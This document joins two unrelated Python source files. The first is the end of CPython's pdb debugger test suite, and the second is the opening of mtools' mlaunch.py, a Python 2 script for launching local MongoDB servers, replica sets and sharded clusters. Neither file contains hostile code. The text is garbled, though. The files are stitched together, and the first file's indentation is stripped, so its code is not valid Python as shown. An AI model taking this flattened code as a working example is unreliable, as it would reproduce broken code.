def test_issue13183(self):
script = """
from bar import bar
def foo():
bar()
def nope():
pass
def foobar():
foo()
nope()
foobar()
"""
commands = """
from bar import bar
break bar
continue
step
step
quit
"""
bar = """
def bar():
pass
"""
with open('bar.py', 'w') as f:
f.write(textwrap.dedent(bar))
self.addCleanup(os_helper.unlink, 'bar.py')
stdout, stderr = self.run_pdb_script(script, commands)
self.assertTrue(
any('main.py(5)foo()->None' in l for l in stdout.splitlines()),
'Fail to step into the caller after a return')
def test_issue13120(self):
# Invoking "continue" on a non-main thread triggered an exception
# inside signal.signal.
with open(os_helper.TESTFN, 'wb') as f:
f.write(textwrap.dedent("""
import threading
import pdb
def start_pdb():
pdb.Pdb(readrc=False).set_trace()
x = 1
y = 1
t = threading.Thread(target=start_pdb)
t.start()""").encode('ascii'))
cmd = [sys.executable, '-u', os_helper.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
env={**os.environ, 'PYTHONIOENCODING': 'utf-8'}
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'cont\n')
self.assertNotIn(b'Error', stdout,
"Got an error running test script under PDB")
def test_issue36250(self):
with open(os_helper.TESTFN, 'wb') as f:
f.write(textwrap.dedent("""
import threading
import pdb
evt = threading.Event()
def start_pdb():
evt.wait()
pdb.Pdb(readrc=False).set_trace()
t = threading.Thread(target=start_pdb)
t.start()
pdb.Pdb(readrc=False).set_trace()
evt.set()
t.join()""").encode('ascii'))
cmd = [sys.executable, '-u', os_helper.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
env = {**os.environ, 'PYTHONIOENCODING': 'utf-8'}
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'cont\ncont\n')
self.assertNotIn(b'Error', stdout,
"Got an error running test script under PDB")
def test_issue16180(self):
# A syntax error in the debuggee.
script = "def f: pass\n"
commands = ''
expected = "SyntaxError:"
stdout, stderr = self.run_pdb_script(script, commands)
self.assertIn(expected, stdout,
'\n\nExpected:\n{}\nGot:\n{}\n'
'Fail to handle a syntax error in the debuggee.'
.format(expected, stdout))
def test_issue26053(self):
# run command of pdb prompt echoes the correct args
script = "print('hello')"
commands = """
continue
run a b c
run d e f
quit
"""
stdout, stderr = self.run_pdb_script(script, commands)
res = '\n'.join([x.strip() for x in stdout.splitlines()])
self.assertRegex(res, "Restarting .* with arguments:\na b c")
self.assertRegex(res, "Restarting .* with arguments:\nd e f")
def test_readrc_kwarg(self):
script = textwrap.dedent("""
import pdb; pdb.Pdb(readrc=False).set_trace()
print('hello')
""")
save_home = os.environ.pop('HOME', None)
try:
with os_helper.temp_cwd():
with open('.pdbrc', 'w') as f:
f.write("invalid\n")
with open('main.py', 'w') as f:
f.write(script)
cmd = [sys.executable, 'main.py']
proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
)
with proc:
stdout, stderr = proc.communicate(b'q\n')
self.assertNotIn(b"NameError: name 'invalid' is not defined",
stdout)
finally:
if save_home is not None:
os.environ['HOME'] = save_home
def test_readrc_homedir(self):
save_home = os.environ.pop("HOME", None)
with os_helper.temp_dir() as temp_dir, patch("os.path.expanduser"):
rc_path = os.path.join(temp_dir, ".pdbrc")
os.path.expanduser.return_value = rc_path
try:
with open(rc_path, "w") as f:
f.write("invalid")
self.assertEqual(pdb.Pdb().rcLines[0], "invalid")
finally:
if save_home is not None:
os.environ["HOME"] = save_home
def test_read_pdbrc_with_ascii_encoding(self):
script = textwrap.dedent("""
import pdb; pdb.Pdb().set_trace()
print('hello')
""")
save_home = os.environ.pop('HOME', None)
try:
with os_helper.temp_cwd():
with open('.pdbrc', 'w', encoding='utf-8') as f:
f.write("Fran\u00E7ais")
with open('main.py', 'w', encoding='utf-8') as f:
f.write(script)
cmd = [sys.executable, 'main.py']
env = {'PYTHONIOENCODING': 'ascii'}
if sys.platform == 'win32':
env['PYTHONLEGACYWINDOWSSTDIO'] = 'non-empty-string'
proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
env={**os.environ, **env}
)
with proc:
stdout, stderr = proc.communicate(b'c\n')
self.assertIn(b"UnicodeEncodeError: \'ascii\' codec can\'t encode character "
b"\'\\xe7\' in position 21: ordinal not in range(128)", stderr)
finally:
if save_home is not None:
os.environ['HOME'] = save_home
def test_header(self):
stdout = StringIO()
header = 'Nobody expects... blah, blah, blah'
with ExitStack() as resources:
resources.enter_context(patch('sys.stdout', stdout))
resources.enter_context(patch.object(pdb.Pdb, 'set_trace'))
pdb.set_trace(header=header)
self.assertEqual(stdout.getvalue(), header + '\n')
def test_run_module(self):
script = """print("SUCCESS")"""
commands = """
continue
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("SUCCESS" in l for l in stdout.splitlines()), stdout)
def test_module_is_run_as_main(self):
script = """
if __name__ == '__main__':
print("SUCCESS")
"""
commands = """
continue
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("SUCCESS" in l for l in stdout.splitlines()), stdout)
def test_breakpoint(self):
script = """
if __name__ == '__main__':
pass
print("SUCCESS")
pass
"""
commands = """
b 3
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("Breakpoint 1 at" in l for l in stdout.splitlines()), stdout)
self.assertTrue(all("SUCCESS" not in l for l in stdout.splitlines()), stdout)
def test_run_pdb_with_pdb(self):
commands = """
c
quit
"""
stdout, stderr = self._run_pdb(["-m", "pdb"], commands)
self.assertIn(
pdb._usage,
stdout.replace('\r', '') # remove \r for windows
)
def test_module_without_a_main(self):
module_name = 't_main'
os_helper.rmtree(module_name)
init_file = module_name + '/__init__.py'
os.mkdir(module_name)
with open(init_file, 'w') as f:
pass
self.addCleanup(os_helper.rmtree, module_name)
stdout, stderr = self._run_pdb(['-m', module_name], "")
self.assertIn("ImportError: No module named t_main.__main__",
stdout.splitlines())
def test_blocks_at_first_code_line(self):
script = """
#This is a comment, on line 2
print("SUCCESS")
"""
commands = """
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("__main__.py(4)<module>()"
in l for l in stdout.splitlines()), stdout)
def test_relative_imports(self):
self.module_name = 't_main'
os_helper.rmtree(self.module_name)
main_file = self.module_name + '/__main__.py'
init_file = self.module_name + '/__init__.py'
module_file = self.module_name + '/module.py'
self.addCleanup(os_helper.rmtree, self.module_name)
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
f.write(textwrap.dedent("""
top_var = "VAR from top"
"""))
with open(main_file, 'w') as f:
f.write(textwrap.dedent("""
from . import top_var
from .module import var
from . import module
pass # We'll stop here and print the vars
"""))
with open(module_file, 'w') as f:
f.write(textwrap.dedent("""
var = "VAR from module"
var2 = "second var"
"""))
commands = """
b 5
c
p top_var
p var
p module.var2
quit
"""
stdout, _ = self._run_pdb(['-m', self.module_name], commands)
self.assertTrue(any("VAR from module" in l for l in stdout.splitlines()), stdout)
self.assertTrue(any("VAR from top" in l for l in stdout.splitlines()))
self.assertTrue(any("second var" in l for l in stdout.splitlines()))
def test_relative_imports_on_plain_module(self):
# Validates running a plain module. See bpo32691
self.module_name = 't_main'
os_helper.rmtree(self.module_name)
main_file = self.module_name + '/runme.py'
init_file = self.module_name + '/__init__.py'
module_file = self.module_name + '/module.py'
self.addCleanup(os_helper.rmtree, self.module_name)
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
f.write(textwrap.dedent("""
top_var = "VAR from top"
"""))
with open(main_file, 'w') as f:
f.write(textwrap.dedent("""
from . import module
pass # We'll stop here and print the vars
"""))
with open(module_file, 'w') as f:
f.write(textwrap.dedent("""
var = "VAR from module"
"""))
commands = """
b 3
c
p module.var
quit
"""
stdout, _ = self._run_pdb(['-m', self.module_name + '.runme'], commands)
self.assertTrue(any("VAR from module" in l for l in stdout.splitlines()), stdout)
def test_errors_in_command(self):
commands = "\n".join([
'print(',
'debug print(',
'debug doesnotexist',
'c',
])
stdout, _ = self.run_pdb_script('pass', commands + '\n')
self.assertEqual(stdout.splitlines()[1:], [
'-> pass',
'(Pdb) *** SyntaxError: \'(\' was never closed',
'(Pdb) ENTERING RECURSIVE DEBUGGER',
'*** SyntaxError: \'(\' was never closed',
'LEAVING RECURSIVE DEBUGGER',
'(Pdb) ENTERING RECURSIVE DEBUGGER',
'> <string>(1)<module>()',
"((Pdb)) *** NameError: name 'doesnotexist' is not defined",
'LEAVING RECURSIVE DEBUGGER',
'(Pdb) ',
])
def test_issue34266(self):
'''do_run handles exceptions from parsing its arg'''
def check(bad_arg, msg):
commands = "\n".join([
f'run {bad_arg}',
'q',
])
stdout, _ = self.run_pdb_script('pass', commands + '\n')
self.assertEqual(stdout.splitlines()[1:], [
'-> pass',
f'(Pdb) *** Cannot run {bad_arg}: {msg}',
'(Pdb) ',
])
check('\\', 'No escaped character')
check('"', 'No closing quotation')
def test_issue42384(self):
'''When running `python foo.py` sys.path[0] is an absolute path. `python -m pdb foo.py` should behave the same'''
script = textwrap.dedent("""
import sys
print('sys.path[0] is', sys.path[0])
""")
commands = 'c\nq'
with os_helper.temp_cwd() as cwd:
expected = f'(Pdb) sys.path[0] is {os.path.realpath(cwd)}'
stdout, stderr = self.run_pdb_script(script, commands)
self.assertEqual(stdout.split('\n')[2].rstrip('\r'), expected)
@os_helper.skip_unless_symlink
def test_issue42384_symlink(self):
'''When running `python foo.py` sys.path[0] resolves symlinks. `python -m pdb foo.py` should behave the same'''
script = textwrap.dedent("""
import sys
print('sys.path[0] is', sys.path[0])
""")
commands = 'c\nq'
with os_helper.temp_cwd() as cwd:
cwd = os.path.realpath(cwd)
dir_one = os.path.join(cwd, 'dir_one')
dir_two = os.path.join(cwd, 'dir_two')
expected = f'(Pdb) sys.path[0] is {dir_one}'
os.mkdir(dir_one)
with open(os.path.join(dir_one, 'foo.py'), 'w') as f:
f.write(script)
os.mkdir(dir_two)
os.symlink(os.path.join(dir_one, 'foo.py'), os.path.join(dir_two, 'foo.py'))
stdout, stderr = self._run_pdb([os.path.join('dir_two', 'foo.py')], commands)
self.assertEqual(stdout.split('\n')[2].rstrip('\r'), expected)
def test_issue42383(self):
with os_helper.temp_cwd() as cwd:
with open('foo.py', 'w') as f:
s = textwrap.dedent("""
print('The correct file was executed')
import os
os.chdir("subdir")
""")
f.write(s)
subdir = os.path.join(cwd, 'subdir')
os.mkdir(subdir)
os.mkdir(os.path.join(subdir, 'subdir'))
wrong_file = os.path.join(subdir, 'foo.py')
with open(wrong_file, 'w') as f:
f.write('print("The wrong file was executed")')
stdout, stderr = self._run_pdb(['foo.py'], 'c\nc\nq')
expected = '(Pdb) The correct file was executed'
self.assertEqual(stdout.split('\n')[6].rstrip('\r'), expected)
class ChecklineTests(unittest.TestCase):
def setUp(self):
linecache.clearcache() # Pdb.checkline() uses linecache.getline()
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def test_checkline_before_debugging(self):
with open(os_helper.TESTFN, "w") as f:
f.write("print(123)")
db = pdb.Pdb()
self.assertEqual(db.checkline(os_helper.TESTFN, 1), 1)
def test_checkline_after_reset(self):
with open(os_helper.TESTFN, "w") as f:
f.write("print(123)")
db = pdb.Pdb()
db.reset()
self.assertEqual(db.checkline(os_helper.TESTFN, 1), 1)
def test_checkline_is_not_executable(self):
with open(os_helper.TESTFN, "w") as f:
# Test for comments, docstrings and empty lines
s = textwrap.dedent("""
# Comment
\"\"\" docstring \"\"\"
''' docstring '''
""")
f.write(s)
db = pdb.Pdb()
num_lines = len(s.splitlines()) + 2 # Test for EOF
for lineno in range(num_lines):
self.assertFalse(db.checkline(os_helper.TESTFN, lineno))
def load_tests(*args):
from test import test_pdb
suites = [
unittest.makeSuite(PdbTestCase),
unittest.makeSuite(ChecklineTests),
doctest.DocTestSuite(test_pdb)
]
return unittest.TestSuite(suites)
if __name__ == '__main__':
unittest.main()
|
mlaunch.py
|
#!/usr/bin/env python
import Queue
import argparse
import subprocess
import threading
import os, time, sys, re
import socket
import json
import re
import warnings
import psutil
import signal
from collections import defaultdict
from mtools.util import OrderedDict
from operator import itemgetter, eq
from mtools.util.cmdlinetool import BaseCmdLineTool
from mtools.util.print_table import print_table
from mtools.version import __version__
try:
try:
from pymongo import MongoClient as Connection
from pymongo import MongoReplicaSetClient as ReplicaSetConnection
from pymongo import version_tuple as pymongo_version
from bson import SON
from StringIO import StringIO
from distutils.version import LooseVersion
except ImportError:
from pymongo import Connection
from pymongo import ReplicaSetConnection
from pymongo import version_tuple as pymongo_version
from bson import SON
from pymongo.errors import ConnectionFailure, AutoReconnect, OperationFailure, ConfigurationError
except ImportError:
raise ImportError("Can't import pymongo. See http://api.mongodb.org/python/current/ for instructions on how to install pymongo.")
# wrapper around Connection (itself conditionally a MongoClient or
# pymongo.Connection) to specify timeout if pymongo >= 3.0
class MongoConnection(Connection):
def __init__(self, *args, **kwargs):
        if pymongo_version[0] >= 3:
            if 'serverSelectionTimeoutMS' not in kwargs:
                kwargs['serverSelectionTimeoutMS'] = 1
        else:
            # pre-3.0 drivers don't know this option, so drop it before connecting
            if 'serverSelectionTimeoutMS' in kwargs:
                del kwargs['serverSelectionTimeoutMS']
Connection.__init__(self, *args, **kwargs)
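
# Usage sketch (illustrative only, not part of the original tool): on pymongo 3+ the
# wrapper above forces a 1 ms serverSelectionTimeoutMS unless the caller passes one
# explicitly, so probes against unreachable nodes fail almost immediately. The port
# below is a hypothetical example.
def _example_fast_ping(port=27017):
    """ return True if a mongod/mongos answers a ping on `port`, failing fast otherwise. """
    try:
        MongoConnection('localhost:%i' % port).admin.command('ping')
        return True
    except (ConnectionFailure, AutoReconnect):
        return False
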
def wait_for_host(port, interval=1, timeout=30, to_start=True, queue=None):
""" Ping a mongos or mongod every `interval` seconds until it responds, or `timeout` seconds have passed. If `to_start`
is set to False, will wait for the node to shut down instead. This function can be called as a separate thread.
If queue is provided, it will place the results in the message queue and return, otherwise it will just return the result
directly.
"""
host = 'localhost:%i'%port
startTime = time.time()
while True:
if (time.time() - startTime) > timeout:
if queue:
queue.put_nowait((port, False))
return False
try:
# make connection and ping host
con = MongoConnection(host)
con.admin.command('ping')
if to_start:
if queue:
queue.put_nowait((port, True))
return True
else:
time.sleep(interval)
except Exception as e:
if to_start:
time.sleep(interval)
else:
if queue:
queue.put_nowait((port, True))
return True
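
# Usage sketch (illustrative only, not part of the original tool): wait for several
# hypothetical ports concurrently by running wait_for_host in worker threads and
# collecting the (port, success) tuples through a Queue, the same pattern that
# MLaunchTool.wait_for uses further below.
def _example_wait_for_ports(ports=(27017, 27018), timeout=30):
    queue = Queue.Queue()
    threads = [threading.Thread(target=wait_for_host, args=(port, 1, timeout, True, queue)) for port in ports]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    # every thread put exactly one (port, success) tuple on the queue
    return [queue.get_nowait() for _ in ports]
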
def shutdown_host(port, username=None, password=None, authdb=None):
""" send the shutdown command to a mongod or mongos on given port. This function can be called as a separate thread. """
host = 'localhost:%i'%port
try:
mc = MongoConnection(host)
try:
if username and password and authdb:
if authdb != "admin":
raise RuntimeError("given username/password is not for admin database")
else:
try:
mc.admin.authenticate(name=username, password=password)
except OperationFailure:
# perhaps auth is not required
pass
mc.admin.command('shutdown', force=True)
except AutoReconnect:
pass
except OperationFailure:
print "Error: cannot authenticate to shut down %s." % host
return
except ConnectionFailure:
pass
else:
mc.close()
class MLaunchTool(BaseCmdLineTool):
def __init__(self):
BaseCmdLineTool.__init__(self)
# arguments
self.args = None
# startup parameters for each port
self.startup_info = {}
# data structures for the discovery feature
self.cluster_tree = {}
self.cluster_tags = defaultdict(list)
self.cluster_running = {}
# config docs for replica sets (key is replica set name)
self.config_docs = {}
# shard connection strings
self.shard_connection_str = []
def run(self, arguments=None):
""" This is the main run method, called for all sub-commands and parameters.
It sets up argument parsing, then calls the sub-command method with the same name.
"""
# set up argument parsing in run, so that subsequent calls to run can call different sub-commands
self.argparser = argparse.ArgumentParser()
self.argparser.add_argument('--version', action='version', version="mtools version %s" % __version__)
self.argparser.add_argument('--no-progressbar', action='store_true', default=False, help='disables progress bar')
self.argparser.description = 'script to launch MongoDB stand-alone servers, replica sets and shards.'
# make sure init is default command even when specifying arguments directly
if arguments and arguments.startswith('-'):
arguments = 'init ' + arguments
# default sub-command is `init` if none provided
elif len(sys.argv) > 1 and sys.argv[1].startswith('-') and sys.argv[1] not in ['-h', '--help', '--version']:
sys.argv = sys.argv[0:1] + ['init'] + sys.argv[1:]
# create command sub-parsers
subparsers = self.argparser.add_subparsers(dest='command')
self.argparser._action_groups[0].title = 'commands'
self.argparser._action_groups[0].description = 'init is the default command and can be omitted. To get help on individual commands, run mlaunch <command> --help'
# init command
init_parser = subparsers.add_parser('init', help='initialize a new MongoDB environment and start stand-alone instances, replica sets, or sharded clusters.',
description='initialize a new MongoDB environment and start stand-alone instances, replica sets, or sharded clusters')
# either single or replica set
me_group = init_parser.add_mutually_exclusive_group(required=True)
me_group.add_argument('--single', action='store_true', help='creates a single stand-alone mongod instance')
me_group.add_argument('--replicaset', action='store_true', help='creates replica set with several mongod instances')
# replica set arguments
init_parser.add_argument('--nodes', action='store', metavar='NUM', type=int, default=3, help='adds NUM data nodes to replica set (requires --replicaset, default=3)')
init_parser.add_argument('--arbiter', action='store_true', default=False, help='adds arbiter to replica set (requires --replicaset)')
init_parser.add_argument('--name', action='store', metavar='NAME', default='replset', help='name for replica set (default=replset)')
# sharded clusters
init_parser.add_argument('--sharded', '--shards', action='store', nargs='+', metavar='N', help='creates a sharded setup consisting of several singles or replica sets. Provide either list of shard names or number of shards.')
init_parser.add_argument('--config', action='store', default=-1, type=int, metavar='NUM', help='adds NUM config servers to sharded setup (requires --sharded, default=1, with --csrs default=3)')
init_parser.add_argument('--csrs', default=False, action='store_true', help='deploy config servers as a replica set (requires MongoDB >= 3.2.0)')
init_parser.add_argument('--mongos', action='store', default=1, type=int, metavar='NUM', help='starts NUM mongos processes (requires --sharded, default=1)')
# verbose, port, binary path
init_parser.add_argument('--verbose', action='store_true', default=False, help='outputs more verbose information.')
init_parser.add_argument('--port', action='store', type=int, default=27017, help='port for mongod, start of port range in case of replica set or shards (default=27017)')
init_parser.add_argument('--binarypath', action='store', default=None, metavar='PATH', help='search for mongod/s binaries in the specified PATH.')
init_parser.add_argument('--dir', action='store', default='./data', help='base directory to create db and log paths (default=./data/)')
init_parser.add_argument('--hostname', action='store', default=socket.gethostname(), help='override hostname for replica set configuration')
# authentication, users, roles
self._default_auth_roles = ['dbAdminAnyDatabase', 'readWriteAnyDatabase', 'userAdminAnyDatabase', 'clusterAdmin']
init_parser.add_argument('--auth', action='store_true', default=False, help='enable authentication and create a key file and admin user (default=user/password)')
init_parser.add_argument('--username', action='store', type=str, default='user', help='username to add (requires --auth, default=user)')
init_parser.add_argument('--password', action='store', type=str, default='password', help='password for given username (requires --auth, default=password)')
init_parser.add_argument('--auth-db', action='store', type=str, default='admin', metavar='DB', help='database where user will be added (requires --auth, default=admin)')
        init_parser.add_argument('--auth-roles', action='store', default=self._default_auth_roles, metavar='ROLE', nargs='*', help='admin user\'s privilege roles; note that the clusterAdmin role is required to run the stop command (requires --auth, default="%s")' % ' '.join(self._default_auth_roles))
# start command
start_parser = subparsers.add_parser('start', help='starts existing MongoDB instances. Example: "mlaunch start config" will start all config servers.',
description='starts existing MongoDB instances. Example: "mlaunch start config" will start all config servers.')
start_parser.add_argument('tags', metavar='TAG', action='store', nargs='*', default=[], help='without tags, all non-running nodes will be restarted. Provide additional tags to narrow down the set of nodes to start.')
start_parser.add_argument('--verbose', action='store_true', default=False, help='outputs more verbose information.')
start_parser.add_argument('--dir', action='store', default='./data', help='base directory to start nodes (default=./data/)')
start_parser.add_argument('--binarypath', action='store', default=None, metavar='PATH', help='search for mongod/s binaries in the specified PATH.')
# stop command
stop_parser = subparsers.add_parser('stop', help='stops running MongoDB instances. Example: "mlaunch stop shard 2 secondary" will stop all secondary nodes of shard 2.',
description='stops running MongoDB instances with the shutdown command. Example: "mlaunch stop shard 2 secondary" will stop all secondary nodes of shard 2.')
stop_parser.add_argument('tags', metavar='TAG', action='store', nargs='*', default=[], help='without tags, all running nodes will be stopped. Provide additional tags to narrow down the set of nodes to stop.')
stop_parser.add_argument('--verbose', action='store_true', default=False, help='outputs more verbose information.')
stop_parser.add_argument('--dir', action='store', default='./data', help='base directory to stop nodes (default=./data/)')
# restart command
restart_parser = subparsers.add_parser('restart', help='stops, then restarts MongoDB instances.',
description='stops running MongoDB instances with the shutdown command. Then restarts the stopped instances.')
restart_parser.add_argument('tags', metavar='TAG', action='store', nargs='*', default=[], help='without tags, all non-running nodes will be restarted. Provide additional tags to narrow down the set of nodes to start.')
restart_parser.add_argument('--verbose', action='store_true', default=False, help='outputs more verbose information.')
restart_parser.add_argument('--dir', action='store', default='./data', help='base directory to restart nodes (default=./data/)')
restart_parser.add_argument('--binarypath', action='store', default=None, metavar='PATH', help='search for mongod/s binaries in the specified PATH.')
# list command
list_parser = subparsers.add_parser('list', help='list MongoDB instances of this environment.',
description='list MongoDB instances of this environment.')
list_parser.add_argument('--dir', action='store', default='./data', help='base directory to list nodes (default=./data/)')
list_parser.add_argument('--tags', action='store_true', default=False, help='outputs the tags for each instance. Tags can be used to target instances for start/stop/kill.')
list_parser.add_argument('--startup', action='store_true', default=False, help='outputs the startup command lines for each instance.')
list_parser.add_argument('--verbose', action='store_true', default=False, help='alias for --tags.')
# list command
kill_parser = subparsers.add_parser('kill', help='kills (or sends another signal to) MongoDB instances of this environment.',
description='kills (or sends another signal to) MongoDB instances of this environment.')
kill_parser.add_argument('tags', metavar='TAG', action='store', nargs='*', default=[], help='without tags, all running nodes will be killed. Provide additional tags to narrow down the set of nodes to kill.')
kill_parser.add_argument('--dir', action='store', default='./data', help='base directory to kill nodes (default=./data/)')
kill_parser.add_argument('--signal', action='store', default=15, help='signal to send to processes, default=15 (SIGTERM)')
kill_parser.add_argument('--verbose', action='store_true', default=False, help='outputs more verbose information.')
# argparser is set up, now call base class run()
BaseCmdLineTool.run(self, arguments, get_unknowns=True)
# conditions on argument combinations
if self.args['command'] == 'init' and 'single' in self.args and self.args['single']:
if self.args['arbiter']:
self.argparser.error("can't specify --arbiter for single nodes.")
# replace path with absolute path, but store relative path as well
self.relative_dir = self.args['dir']
self.dir = os.path.abspath(self.args['dir'])
self.args['dir'] = self.dir
# branch out in sub-commands
getattr(self, self.args['command'])()
# -- below are the main commands: init, start, stop, list, kill
def init(self):
""" sub-command init. Branches out to sharded, replicaset or single node methods. """
# check for existing environment. Only allow subsequent 'mlaunch init' if they are identical.
if self._load_parameters():
if self.loaded_args != self.args:
raise SystemExit('A different environment already exists at %s.' % self.dir)
first_init = False
else:
first_init = True
# number of default config servers
if self.args['config'] == -1:
if self.args['csrs']:
self.args['config'] = 3
else:
self.args['config'] = 1
# Check if config replicaset is applicable to this version
if self.args['csrs']:
binary = "mongod"
if self.args and self.args['binarypath']:
binary = os.path.join(self.args['binarypath'], binary)
ret = subprocess.Popen(['%s --version' % binary], stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
out, err = ret.communicate()
buf = StringIO(out)
current_version = buf.readline().rstrip('\n')[-5:]
if LooseVersion(current_version) < LooseVersion("3.2.0"):
errmsg = " \n * The '--csrs' option requires MongoDB version 3.2.0 or greater, the current version is %s.\n" % current_version
raise SystemExit(errmsg)
# check if authentication is enabled, make key file
if self.args['auth'] and first_init:
if not os.path.exists(self.dir):
os.makedirs(self.dir)
os.system('openssl rand -base64 753 > %s/keyfile'%self.dir)
os.system('chmod 600 %s/keyfile'%self.dir)
# construct startup strings
self._construct_cmdlines()
# if not all ports are free, complain and suggest alternatives.
all_ports = self.get_tagged(['all'])
ports_avail = self.wait_for(all_ports, 1, 1, to_start=False)
if not all(map(itemgetter(1), ports_avail)):
dir_addon = ' --dir %s'%self.relative_dir if self.relative_dir != './data' else ''
errmsg = '\nThe following ports are not available: %s\n\n' % ', '.join( [ str(p[0]) for p in ports_avail if not p[1] ] )
errmsg += " * If you want to restart nodes from this environment, use 'mlaunch start%s' instead.\n" % dir_addon
errmsg += " * If the ports are used by a different mlaunch environment, stop those first with 'mlaunch stop --dir <env>'.\n"
errmsg += " * You can also specify a different port range with an additional '--port <startport>'\n"
raise SystemExit(errmsg)
if self.args['sharded']:
shard_names = self._get_shard_names(self.args)
# start mongod (shard and config) nodes and wait
nodes = self.get_tagged(['mongod', 'down'])
self._start_on_ports(nodes, wait=True, overrideAuth=True)
# initiate replica sets if init is called for the first time
if first_init:
if self.args['csrs']:
# Initiate config servers in a replicaset
members = sorted(self.get_tagged(["config"]))
self._initiate_replset(members[0], "configRepl")
for shard in shard_names:
# initiate replica set on first member
members = sorted(self.get_tagged([shard]))
self._initiate_replset(members[0], shard)
# add mongos
mongos = sorted(self.get_tagged(['mongos', 'down']))
self._start_on_ports(mongos, wait=True, overrideAuth=True)
if first_init:
# add shards
mongos = sorted(self.get_tagged(['mongos']))
con = MongoConnection('localhost:%i'%mongos[0])
shards_to_add = len(self.shard_connection_str)
nshards = con['config']['shards'].count()
if nshards < shards_to_add:
if self.args['replicaset']:
print "adding shards. can take up to 30 seconds..."
else:
print "adding shards."
shard_conns_and_names = zip(self.shard_connection_str, shard_names)
while True:
try:
nshards = con['config']['shards'].count()
except:
nshards = 0
if nshards >= shards_to_add:
break
for conn_str, name in shard_conns_and_names:
try:
res = con['admin'].command( SON([('addShard', conn_str), ('name', name)]) )
except Exception as e:
if self.args['verbose']:
print e, ', will retry in a moment.'
continue
if res['ok']:
if self.args['verbose']:
print "shard %s added successfully"%conn_str
shard_conns_and_names.remove( (conn_str, name) )
break
else:
if self.args['verbose']:
print res, '- will retry'
time.sleep(1)
elif self.args['single']:
# just start node
nodes = self.get_tagged(['single', 'down'])
self._start_on_ports(nodes, wait=False)
elif self.args['replicaset']:
# start nodes and wait
nodes = sorted(self.get_tagged(['mongod', 'down']))
self._start_on_ports(nodes, wait=True)
# initiate replica set
if first_init:
self._initiate_replset(nodes[0], self.args['name'])
# wait for all nodes to be running
nodes = self.get_tagged(['all'])
self.wait_for(nodes)
# now that nodes are running, add admin user if authentication enabled
if self.args['auth'] and first_init:
self.discover()
nodes = []
if self.args['sharded']:
nodes = self.get_tagged(['mongos', 'running'])
elif self.args['single']:
nodes = self.get_tagged(['single', 'running'])
elif self.args['replicaset']:
print "waiting for primary to add a user."
if self._wait_for_primary():
nodes = self.get_tagged(['primary', 'running'])
else:
raise RuntimeError("failed to find a primary, so adding admin user isn't possible")
if not nodes:
raise RuntimeError("can't connect to server, so adding admin user isn't possible")
if "clusterAdmin" not in self.args['auth_roles']:
warnings.warn("the stop command will not work with auth because the user does not have the clusterAdmin role")
self._add_user(sorted(nodes)[0], name=self.args['username'], password=self.args['password'],
database=self.args['auth_db'], roles=self.args['auth_roles'])
if self.args['verbose']:
print "added user %s on %s database" % (self.args['username'], self.args['auth_db'])
# in sharded env, if --mongos 0, kill the dummy mongos
if self.args['sharded'] and self.args['mongos'] == 0:
port = self.args['port']
print "shutting down temporary mongos on localhost:%s" % port
username = self.args['username'] if self.args['auth'] else None
password = self.args['password'] if self.args['auth'] else None
authdb = self.args['auth_db'] if self.args['auth'] else None
shutdown_host(port, username, password, authdb)
# write out parameters
if self.args['verbose']:
print "writing .mlaunch_startup file."
self._store_parameters()
# discover again, to get up-to-date info
self.discover()
# for sharded authenticated clusters, restart after first_init to enable auth
if self.args['sharded'] and self.args['auth'] and first_init:
if self.args['verbose']:
print "restarting cluster to enable auth..."
self.restart()
if self.args['verbose']:
print "done."
def stop(self):
""" sub-command stop. This method will parse the list of tags and stop the matching nodes.
Each tag has a set of nodes associated with it, and only the nodes matching all tags (intersection)
will be shut down.
"""
self.discover()
matches = self._get_ports_from_args(self.args, 'running')
if len(matches) == 0:
raise SystemExit('no nodes stopped.')
for port in matches:
if self.args['verbose']:
print "shutting down localhost:%s" % port
username = self.loaded_args['username'] if self.loaded_args['auth'] else None
password = self.loaded_args['password'] if self.loaded_args['auth'] else None
authdb = self.loaded_args['auth_db'] if self.loaded_args['auth'] else None
shutdown_host(port, username, password, authdb)
# wait until nodes are all shut down
self.wait_for(matches, to_start=False)
print "%i node%s stopped." % (len(matches), '' if len(matches) == 1 else 's')
# there is a very brief period in which nodes are not reachable anymore, but the
# port is not torn down fully yet and an immediate start command would fail. This
        # very short sleep prevents that case, and it is practically not noticeable by users
time.sleep(0.1)
# refresh discover
self.discover()
def start(self):
""" sub-command start. """
self.discover()
# startup_info only gets loaded from protocol version 2 on, check if it's loaded
if not self.startup_info:
# hack to make environment startable with older protocol versions < 2: try to start nodes via init if all nodes are down
if len(self.get_tagged(['down'])) == len(self.get_tagged(['all'])):
self.args = self.loaded_args
print "upgrading mlaunch environment meta-data."
return self.init()
else:
raise SystemExit("These nodes were created with an older version of mlaunch (v1.1.1 or below). To upgrade this environment and make use of the start/stop/list commands, stop all nodes manually, then run 'mlaunch start' again. You only have to do this once.")
# if new unknown_args are present, compare them with loaded ones (here we can be certain of protocol v2+)
if self.args['binarypath'] != None or (self.unknown_args and set(self.unknown_args) != set(self.loaded_unknown_args)):
# store current args, use self.args from the file (self.loaded_args)
start_args = self.args
self.args = self.loaded_args
self.args['binarypath'] = start_args['binarypath']
# construct new startup strings with updated unknown args. They are for this start only and
# will not be persisted in the .mlaunch_startup file
self._construct_cmdlines()
# reset to original args for this start command
self.args = start_args
matches = self._get_ports_from_args(self.args, 'down')
if len(matches) == 0:
raise SystemExit('no nodes started.')
# start mongod and config servers first
